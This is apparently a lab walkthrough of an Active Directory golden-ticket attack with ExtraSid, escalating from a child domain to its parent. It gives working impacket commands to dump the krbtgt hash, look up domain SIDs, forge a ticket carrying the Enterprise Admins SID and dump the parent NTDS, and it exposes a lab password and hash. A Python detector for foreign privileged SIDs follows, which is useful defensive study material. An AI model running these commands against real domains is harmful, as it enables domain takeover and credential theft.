Golden ticket + ExtraSid

  • We have done the exploitation in one command with impacket's raiseChild.py; now let's do the same thing step by step and create the golden ticket ourselves.

  • A full explanation of the attack can be found here: https://adsecurity.org/?p=1640

  • First, dump the krbtgt hash of the domain we own (the child domain)

# dump child ntds and get krbtgt NT hash
secretsdump.py -just-dc-user north/krbtgt \
 north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.11

...
krbtgt:502:aa3b435b51404eeaad3b435b51404ee:13354bc6e1b48fff8d66a2090e909b27:::
...

  • Now get the child and parent domain SID

Get SID for north.newyork.local

# dump child domain SID
lookupsid.py -domain-sids north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.11 0

[*] Brute forcing SIDs at 192.168.56.11
[*] StringBinding ncacn_np:192.168.56.11[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3634065772-4036021599-3644360361

Get SID for newyork.local (the parent domain; same child credentials, but the query goes to the parent DC at 192.168.56.10)

# dump parent domain SID
lookupsid.py -domain-sids north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.10 0

[*] Brute forcing SIDs at 192.168.56.10
[*] StringBinding ncacn_np:192.168.56.10[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-620482180-1620433373-1814187987

  • Now forge the golden ticket with ticketer.py: the child krbtgt hash and the child domain SID sign the ticket, and the parent domain SID with RID 519 (Enterprise Admins) is injected as the extra SID

# -nthash     : krbtgt NT hash of north.newyork.local
# -domain-sid : north.newyork.local SID
# -extra-sid  : newyork.local SID + RID 519 (Enterprise Admins)
# (comments are kept above the command: a "# ..." after a trailing
#  backslash would break the line continuation)
ticketer.py -nthash 13354bc6e1b48fff8d66a2090e909b27 \
 -domain-sid S-1-5-21-3634065772-4036021599-3644360361 \
 -domain north.newyork.local \
 -extra-sid S-1-5-21-620482180-1620433373-1814187987-519 \
 goldenuser

The task for you is to set the ccname (KRB5CCNAME) and use -no-pass like we have done before :)

export KRB5CCNAME=/home/jefe/delegation/goldenuser.ccache

  • And we use the ticket to dump the parent domain NTDS

secretsdump.py -k -no-pass -just-dc-ntlm \
 north.newyork.local/goldenuser@nyc.newyork.local
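As an added, defender-side example (not part of the original walkthrough and not impacket code): the whole trick above rests on the forged PAC carrying a SID whose domain prefix belongs to the parent domain while the user's own SID belongs to the child. The script below shows how the `-extra-sid` value is composed from the parent domain SID plus RID 519, and then runs a check over constructed, normalised records (one line per authenticated principal, with the SIDs presented in the ticket) that flags any SID from a foreign domain mapping to a privileged RID. The record format, the user RIDs and the sample lines are assumptions made for this example, not output of any real tool.

```python
import re

# Well-known RIDs that should never show up under a *foreign* domain prefix
# in a user's ticket unless SID History was deliberately granted.
PRIVILEGED_RIDS = {
    512: "Domain Admins",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

# Domain SIDs look like S-1-5-21-<a>-<b>-<c>-<rid>; builtin SIDs (S-1-5-32-...)
# have no domain part and are ignored by this check.
SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}-(\d+)$")


def split_sid(sid: str):
    """Return (domain_sid, rid) for a domain SID; raise ValueError otherwise."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain SID: {sid}")
    return sid[: sid.rfind("-")], int(m.group(1))


def compose_sid(domain_sid: str, rid: int) -> str:
    """Build an account/group SID from a domain SID and a RID
    (this is exactly how the page's -extra-sid value is formed)."""
    return f"{domain_sid}-{rid}"


def flag_foreign_privileged_sids(user_sid: str, presented_sids):
    """Return [(sid, group_name)] for every presented SID that belongs to a
    different domain than the user and maps to a privileged RID."""
    user_domain, _ = split_sid(user_sid)
    findings = []
    for sid in presented_sids:
        try:
            dom, rid = split_sid(sid)
        except ValueError:
            continue  # builtin / well-known SID, not a domain SID
        if dom != user_domain and rid in PRIVILEGED_RIDS:
            findings.append((sid, PRIVILEGED_RIDS[rid]))
    return findings


# Constructed sample records (assumed key=value format, not real log output).
# The first line mirrors the ticket forged above: a child-domain user whose
# ticket also presents the parent domain's Enterprise Admins SID.
SAMPLE_RECORDS = [
    "user=goldenuser user_sid=S-1-5-21-3634065772-4036021599-3644360361-1109 "
    "sids=S-1-5-21-3634065772-4036021599-3644360361-513,"
    "S-1-5-21-620482180-1620433373-1814187987-519",
    "user=fernando.alonzo user_sid=S-1-5-21-3634065772-4036021599-3644360361-1104 "
    "sids=S-1-5-21-3634065772-4036021599-3644360361-513,S-1-5-32-545",
]


def parse_record(line: str):
    """Split one 'key=value key=value' line into (user, user_sid, [sids])."""
    fields = dict(kv.split("=", 1) for kv in line.split())
    return fields["user"], fields["user_sid"], fields["sids"].split(",")


def scan(records):
    """Map user -> findings for every record with a foreign privileged SID."""
    alerts = {}
    for line in records:
        user, user_sid, sids = parse_record(line)
        hits = flag_foreign_privileged_sids(user_sid, sids)
        if hits:
            alerts[user] = hits
    return alerts


if __name__ == "__main__":
    parent = "S-1-5-21-620482180-1620433373-1814187987"
    print("extra SID used above:", compose_sid(parent, 519))
    for user, hits in scan(SAMPLE_RECORDS).items():
        for sid, group in hits:
            print(f"ALERT {user}: foreign {group} SID {sid} in ticket")
```

The check is deliberately keyed on the domain prefix, not on the user name: a legitimate Domain Admin of the child domain presents `<child SID>-512` and is not flagged, while any `<other domain SID>-512/518/519` is. On the prevention side, SID filtering across the trust strips exactly these foreign SIDs; it is on by default for external and forest trusts but not for the intra-forest parent-child trust used here, which is why the walkthrough works (see the adsecurity link at the top of the page).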
